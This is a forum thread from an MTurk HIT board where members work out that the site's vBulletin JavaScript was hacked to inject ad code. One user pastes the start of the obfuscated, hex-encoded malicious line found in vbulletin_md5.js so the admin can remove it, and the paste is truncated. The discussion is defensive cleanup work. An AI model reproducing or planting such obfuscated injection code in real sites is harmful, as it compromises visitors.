Where Dem HITs At? 06/04 Skillfull Soiled Skillfull Sunday

If he fixes it, I say let him stay on a trial basis lol Even though pretty sure we don't get along.

 

Well, Adam means dirt, or from dirt. So...

 

Im kind of impressed how much everyone hates the admin >.> at this point i wouldn't be surprised if he banned everyone just cause he could.

 

He would need to care.

 

how can you hate someone that doesn't exist.

 

If deleting the line doesn't work or breaks the forum for some reason, a server admin has to edit this file http://mturkforum.com/clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js to remove the injected ad code explained in http://labs.sucuri.net/?note=2016-09-23 after decoding it using a deobfuscater like http://jsbeautifier.org/

 

So in other words the ads will be here forever lol

 

Now that I think about it Fernando found the ad code in yuiloader-dom-event.js in his case, but the hacker could've injected it in ANY JS script so the server admin should also check these ones:

http://mturkforum.com/clientscript/vbulletin-core.js
http://mturkforum.com/clientscript/vbulletin_read_marker.js
http://mturkforum.com/clientscript/vbulletin_facebook.js

 

I found the infected JS file it's http://mturkforum.com/clientscript/vbulletin_md5.js

 

So it was a hacker ?

Im still hoping the admin did that on purpose just to see the reaction x.x

Edit: If it was a hacker how could the admin not know about that ~.~?

 

I knew it was a hacker. I told you.

 

Ok this should be the definite fix, I compared that http://mturkforum.com/clientscript/vbulletin_md5.js to http://www.conceptart.org/forums/clientscript/vbulletin_md5.js (just a random other vB site with the same file) and the code was identical after deobfuscation except for a single (the last) line, 250, beginning with:

Code:

var _0xc93a = ["\x3C\x73\x63\x72\x69\x70\x74\x20\x64\x61\x74\x61\x2D\x63\x66\x61\x73\x79\x6E\x63\x3D\x22\x66\x61\x6C\x73\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x3E\x76\x61\x72\x20\x4F\x37\x69\x3D\x77\x69\x6E\x64\x6F\x77\x3B\x66\x6F\x72\x28\x76\x61\x72\x20\x50\x20\x69\x6E\x20\x4F\x37\x69\x29\x7B\x69\x66\x28\x50\x2E\x6C\x65\x6E\x67\x74\x68\x3D\x3D\x3D\x28\x39\x37\x3C\x3D\x28\x31\x39\x2C\x38\x2E\x38\x45\x32\x29\x3F\x28\x30\x78\x36\x35\x2C\x36\x29\x3A\x31\x30\x35\x2E\x3E\x3D\x28\x30\x78\x33\x38\x2C\x31\x30\x2E\x32\x35\x45\x32\x29\x3F\x28\x33\x39\x2C\x27\x55\x27\x29\x3A\x28\x30\x78\x31\x39\x39\x2C\x31\x30\x2E\x31\x39\x45\x32\x29\x29\x26\x26\x50\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x30\x78\x33\x34\x3C\x28\x31\x33\x32\x2E\x2C\x39\x35\x2E\x38\x30\x45\x31\x29\x3F\x28\x31\x36\x2C\x33\x29\x3A\x28\x34\x39\x2C\x37\x31\x29\x3E\x30\x78\x44\x37\x3F\x28\x30\x78\x46\x35\x2C\x31\x2E\x34\x30\x45\x31\x29\x3A\x28\x31\x30\x34\x2C\x34\x33\x2E\x31\x45\x31\x29\x29\x29\x3D\x3D\x3D\x28\x28\x30\x78\x46\x41\x2C\x30\x78\x41\x45\x29\x3C\x3D\x34\x34\x2E\x3F\x28\x32\x31\x2C\x31\x34\x2E\x36\x32\x30\x45\x32\x29\x3A\x32\x39\x3C\x28\x38\x39\x2E\x36\x30\x45\x31\x2C\x30\x78\x31\x37\x33\x29\x3F\x28\x30\x78\x31\x30\x43\x2C\x31\x30\x30\x29\x3A\x28\x38\x38\x2C\x31\x33\x30\x2E\x29\x29\x26\x26\x50\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x31\x34\x30\x2E\x38\x45\x31\x3C\x3D\x28\x31\x32\x36\x2C\x31\x34\x2E\x35\x45\x32\x29\x3F\x28\x35\x30\x2C\x35\x29\x3A\x28\x30\x78\x32\x30\x33\x2C\x31\x30\x2E\x39\x45\x31\x29\x3E\x3D\x28\x30\x78\x35\x34\x2C\x30\x78\x32\x34\x31\x29\x3F\x28\x31\x34\x32\x2C\x27\x55\x27\x29\x3A\x28\x32\x31\x2E\x34\x30\x45\x31\x2C\x30\x78\x41\x32\x29\x29\x29\x3D\x3D\x3D\x28\x28\x33\x2E\x2C\x35\x33\x29\x3E\x28\x30\x78\x34\x44\x2C\x30\x78\x31\x31\x30\x29\x3F\x28\x31\x34\x2E\x31\x30\x45\x31\x2C\x30\x78\x31\x36\x39\x29\x3A\x31\x2E\x36\x35\x30\x45\x32\x3E\x28\x38\x2E\x36\x45\x32\x2C\x31\x32\x35\x2E\x29\x3F\x28\x30\x78\x31\x35\x39\x2C\x31\x31\x39\x29\x3A\x28\x30\x78\x32\x31\x41\x2C\x31\x33\x33\x2E\x29\x29\x26\x26\x50\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x28\x33\x39\x2E\x2C\x30\x78\x45\x31\x29\x3E\x3D\x28\x30\x78\x37\x35\x2C\x35\x33\x2E\x29\x3F\x28\x31\x34\x2E\x34\x32\x45\x32\x2C\x31\x29\x3A\x28\x31\x30\x2E\x33\x31\x45\x32\x2C\x37\x35\x2E\x29\x29\x29\x3D\x3D\x3D\x28\x38\x31\x2E\x3C\x28\x30\x78\x38\x44\x2C\x31\x32\x2E\x34\x32\x45\x32\x29\x3F\x28\x31\x32\x33\x2C\x31\x30\x35\x29\x3A\x28\x36\x32\x2E\x34\x30\x45\x31\x2C\x35\x2E\x30\x45\x32\x29\x29\x26\x26\x50\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x33\x2E\x37\x45\x31\x3E\x3D\x28\x33\x32\x2C\x35\x39\x2E\x38\x30\x45\x31\x29\x3F\x31\x31\x30\x2E\x3A\x28\x30\x78\x31\x46\x34\x2C\x31\x32\x34\x29\x3C\x3D\x28\x30\x78\x31\x41\x38\x2C\x30\x78\x31\x36\x30\x29\x3F\x28\x31\x30\x32\x2C\x30\x29\x3A\x28\x30\x78\x36\x42\x2C\x30\x78\x45\x46\x29\x29\x29\x3D\x3D\x3D\x28\x39\x2E\x35\x35\x45\x32\x3E\x3D\x28\x30\x78\x32\x34\x32\x2C\x31\x31\x30\x29\x3F\x28\x38\x39\x2E\x2C\x31\x31\x39\x29\x3A\x28\x38\x38\x2E\x37\x45\x31\x2C\x34\x2E\x36\x38\x45\x32\x29\x29\x29\x62\x72\x65\x61\x6B\x7D\x3B\x66\x6F\x72\x28\x76\x61\x72\x20\x41\x20\x69\x6E\x20\x4F\x37\x69\x5B\x50\x5D\x29\x7B\x69\x66\x28\x41\x2E\x6C\x65\x6E\x67\x74\x68\x3D\x3D\x3D\x28\x28\x34\x30\x2E\x2C\x38\x38\x2E\x29\x3E\x33\x2E\x37\x45\x31\x3F\x28\x30\x78\x44\x33\x2C\x38\x29\x3A\x30\x78\x33\x34\x3E\x28\x31\x32\x32\x2E\x2C\x31\x2E\x32\x32\x32\x45\x33\x29\x3F\x28\x31\x32\x37\x2E\x30\x45\x31\x2C\x27\x2F\x27\x29\x3A\x28\x37\x33\x2E\x32\x45\x31\x2C\x37\x37\x2E\x29\x29\x26\x26\x41\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x28\x31\x2E\x32\x34\x34\x45\x33\x2C\x30\x78\x31\x34\x35\x29\x3E\x31\x36\x3F\x28\x30\x78\x32\x31\x35\x2C\x35\x29\x3A\x28\x33\x2E\x38\x38\x45\x32\x2C\x31\x2E\x31\x33\x35\x45\x33\x29\x3C\x38\x36\x3F\x28\x32\x31\x2C\x30\x78\x31\x33\x30\x29\x3A\x28\x31\x31\x30\x2E\x36\x30\x45\x31\x2C\x37\x35\x29\x29\x29\x3D\x3D\x3D\x28\x31\x34\x36\x3E\x28\x30\x78\x32\x30\x32\x2C\x36\x33\x2E\x29\x3F\x28\x30\x78\x31\x31\x45\x2C\x31\x30\x31\x29\x3A\x28\x30\x78\x31\x43\x2C\x35\x34\x2E\x30\x45\x31\x29\x3C\x3D\x33\x36\x3F\x28\x30\x78\x32\x30\x2C\x32\x38\x29\x3A\x28\x38\x39\x2E\x2C\x30\x78\x31\x36\x41\x29\x29\x26\x26\x41\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x28\x39\x2E\x36\x35\x45\x32\x2C\x30\x78\x31\x46\x39\x29\x3E\x39\x3F\x28\x30\x78\x31\x41\x33\x2C\x37\x29\x3A\x35\x3E\x3D\x28\x30\x78\x46\x46\x2C\x37\x35\x2E\x37\x45\x31\x29\x3F\x28\x31\x31\x33\x2E\x2C\x27\x66\x27\x29\x3A\x28\x31\x34\x37\x2C\x31\x32\x34\x2E\x38\x30\x45\x31\x29\x29\x29\x3D\x3D\x3D\x28\x28\x31\x30\x32\x2C\x30\x78\x31\x30\x30\x29\x3E\x3D\x28\x31\x30\x36\x2C\x31\x34\x30\x2E\x38\x45\x31\x29\x3F\x28\x30\x78\x46\x33\x2C\x35\x36\x2E\x29\x3A\x38\x39\x2E\x3C\x3D\x28\x36\x2E\x30\x37\x45\x32\x2C\x34\x2E\x39\x33\x45\x32\x29\x3F\x28\x30\x78\x36\x34\x2C\x31\x31\x36\x29\x3A\x28\x30\x78\x31\x42\x46\x2C\x31\x33\x32\x2E\x31\x45\x31\x29\x29\x26\x26\x41\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x30\x78\x42\x39\x3E\x3D\x28\x31\x34\x34\x2E\x2C\x39\x36\x29\x3F\x28\x31\x32\x36\x2C\x33\x29\x3A\x28\x36\x30\x2C\x31\x33\x39\x2E\x29\x29\x29\x3D\x3D\x3D\x28\x28\x30\x78\x32\x32\x35\x2C\x31\x34\x33\x2E\x29\x3E\x3D\x36\x39\x3F\x28\x30\x78\x31\x39\x43\x2C\x31\x31\x37\x29\x3A\x28\x35\x2E\x31\x33\x45\x32\x2C\x35\x33\x2E\x29\x29\x26\x26\x41\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x28\x31\x30\x30\x3E\x3D\x28\x38\x32\x2C\x37\x31\x29\x3F\x28\x31\x30\x37\x2C\x30\x29\x3A\x28\x30\x78\x31\x41\x41\x2C\x31\x2E\x38\x36\x45\x32\x29\x29\x29\x3D\x3D\x3D\x28\x28\x35\x36\x2C\x35\x32\x29\x3E\x34\x37\x3F\x28\x33\x34\x2C\x31\x30\x30\x29\x3A\x28\x33\x34\x2E\x2C\x33\x38\x29\x29\x29\x62\x72\x65\x61\x6B\x7D\x3B\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x57\x2C\x6D\x2C\x52\x2C\x48\x29\x7B\x4F\x37\x69\x5B\x50\x5D\x5B\x6D\x5D\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x76\x61\x72\x20\x77\x3D\x28\x30\x78\x31\x35\x39\x3E\x28\x38\x2E\x34\x39\x4 ...

so the owner should delete that really long line from http://mturkforum.com/clientscript/vbulletin_md5.js and it should fix it once and for all